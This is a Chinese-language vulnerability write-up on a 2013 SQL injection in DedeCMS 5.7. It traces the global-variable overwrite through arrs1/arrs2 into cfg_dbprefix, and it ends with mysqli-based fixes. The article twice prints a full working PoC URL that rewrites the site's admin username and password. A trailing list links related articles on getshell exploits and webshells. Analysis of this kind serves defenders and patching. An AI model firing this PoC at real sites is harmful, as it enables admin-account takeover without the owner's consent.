Dedecms最新注入漏洞分析及修復方法

最近看到網上曝出的dedecms最新版本的一個注入漏洞利用,漏洞PoC和分析文章也已在網上公開.但是在我實際測試過程當中,發(fā)現無法復現。原因是此漏洞的利用需要一定的前提條件,而原分析文章當中并沒有交代這些,所以這里將我的分析過程以及一些觸發(fā)的必要條件總結了一下。
一. 漏洞跟蹤
發(fā)布時間:2013年6月7日
漏洞描述:
DedeCMS是一個網站應用系統(tǒng)構建平臺,也是一個強大的網站內容管理系統(tǒng)?;赑HP+MySQL的技術架構,完全開源加上強大穩(wěn)定的技術架構,既可以用來構建復雜體系的企業(yè)信息門戶或電子商務網站平臺,也可以用來管理簡單內容發(fā)布網站,不管是商務資源門戶還是娛樂信息門戶,它都是您管理網站的好幫手。
漏洞觸發(fā)的根源在于dedesql.class.php在調用$GLOBALS[‘arrs1’]、$GLOBALS[‘arrs1’]這兩個全局變量之前未對其進行初始化,導致能夠覆蓋任意全局變量。
漏洞危害:因為dedecms的使用非常廣泛,而此漏洞利用方便,危害性高,能夠遠程獲取管理后臺,進而直接getshell獲取系統(tǒng)控制權。
觸發(fā)條件:確保php.ini中使用php_mysql.dll同時未開啟php_mysqli.dll,
如圖所示:
受影響版本:dedecms 5.7
二. 漏洞原理
首先說一下dedecms不安全的參數處理機制,這里我們看一下/include/common.inc.php代碼的第79行:
foreach(Array(‘_GET’,'_POST’,'_COOKIE’) as $_request)
{
foreach($$_request as $_k => $_v)
{
if($_k == ‘nvarname’) ${$_k} = $_v;
else ${$_k} = _RunMagicQuotes($_v);
}
}
萬惡之源其實就在這里,基本上目前dede被發(fā)現的漏洞全都死在這里。我們可以看到,程序從GPC數組中取出名值對后,只是對$_v做了簡單的addslashes處理,就直接賦給了${$_k},實現了類似全局變量覆蓋的機制,設計的初衷是為了開發(fā)方便,但卻存在著嚴重的安全問題。PHP在經歷了這么多年的更新?lián)Q代終于修補了register_globals問題,但是dede的這段代碼使php付出的努力全部白費。
下面我們回歸漏洞。
首先是/include/dedesql.class.php的第589-600行,
在執(zhí)行這段代碼之前,程序未初始化$arrs1和$arrs2這兩個數組。結合前面提到的dede不安全的參數處理機制,利用這段代碼我們可以覆蓋任意全局變量。例如在這個漏洞中,我們可以控制$GLOBALS['cfg_dbprefix']的值。
然后,我們來看一下如何利用$GLOBALS['cfg_dbprefix']。
這里在/include/dedesql.class.php的第512行SetQuery函數中,代碼如下
這里因為$GLOBALS['cfg_dbprefix']是可控的,進而$prefix也是可控的,所以在這兒就造成了SQL注入。
下面跟蹤一下整個漏洞的觸發(fā)過程,這是網上已經公開的PoC:
http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
首先看這個if判斷,意思是如果開啟了mysqli擴展,則包含dedesqli.class.php。這里存在漏洞的代碼在dedesql.class.php中,所以漏洞利用的前提條件是必須關閉mysqli擴展。
這里跟入dedesql.class.php代碼,如圖
這里我們傳入的arrs1、arrs2兩個數組因為還沒有被初始化,所以這里$v1、$v2拼接為字符串,如圖所示
所以執(zhí)行到這里$GLOBALS['cfg_dbprefix']被覆蓋為
admin` SET `userid`=’test’, `pwd`=’f297a57a5a743894a0e4′ where id=1 #
繼續(xù)跟蹤代碼執(zhí)行,
跟入ExecuteNoneQuery2函數,一直跟進SetQuery,如圖
這里因為$GLOBALS['cfg_dbprefix']是我們可控的,所以就造成了注入,這里看一下$sql的值,如圖所示
因為ExecuteNoneQuery2函數沒有使用mysql-ids進行過濾,所以這里借助它來注入。執(zhí)行update成功之后,后臺賬戶為test,密碼為admin。
三. 漏洞驗證
PoC:
http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
驗證截圖:
四. 漏洞修復
0×01、修改php.ini,確保開啟php_mysqli.dll擴展。
0×02、修改/include/dedesql.class.php中的代碼,如下所示
require_once(DEDEINC.’/common.func.php’);
//引入數據庫類
if ($GLOBALS['cfg_mysql_type'] == ‘mysqli’ && function_exists(“mysqli_init”))
{
//echo $GLOBALS['cfg_mysql_type'];
//exit;
require_once(DEDEINC.’/dedesqli.class.php’);
} else {
require_once(DEDEINC.’/dedesql.class.php’);
}
//require_once(DEDEINC.’/common.func.php’);
相關文章
- 春節(jié)呆在家里上網,我表哥突然找我說要一個DJ網站的VIP會員,說搞定后請我吃KFC,于是就答應了。2011-03-22
- 眾所周知,因使用簡單、客戶群多,織夢CMS一直被爆出許多漏洞。今天小編在群里得到織夢官方論壇某版主可靠消息:DEDECMS爆嚴重安全漏洞,近期官方會發(fā)布相關補丁,望大家及2011-08-20
- 腳本入侵-ASP網站入侵一些技巧 先說明下 先看下是不是html轉的asp生成的站2011-04-24
Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法
這篇文章主要為大家介紹了Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法,對于網絡安全而言非常重要!需要的朋友可以參考下2014-07-05訊時系統(tǒng)(xuas)最新通殺漏洞0day圖文說明
訊時系統(tǒng)(xuas)最新通殺漏洞0day圖文說明,使用訊時網站管理系統(tǒng)的朋友可以參考下。2011-07-15- 手工注入方法,方便大家測試程序漏洞,本人只供學習交流,不建議搞破壞。2011-11-03
phpcms2008 代碼執(zhí)行 批量getshell EXP(使用菜刀)
這篇文章主要介紹了phpcms2008 代碼執(zhí)行 批量getshell EXP的相關資料,需要的朋友可以參考下2014-05-09- 腳本入侵-上傳漏洞總結篇(臭小子),從事于網站開發(fā)的程序員要看下,不要讓自己的程序別黑客利用。2011-04-24
- php后臺插一句話的思路加114網址導航后臺拿webshell的方法。2011-09-29
- DDos攻擊是現在大部分用戶最喜歡的一個話題,近兩年來發(fā)展態(tài)勢也漸趨平緩,歐洲反垃圾郵件組織Spamhaus突然遭受到高達300Gbps的大流量DDos攻擊被認為是史上最大DDoS攻擊,2016-09-20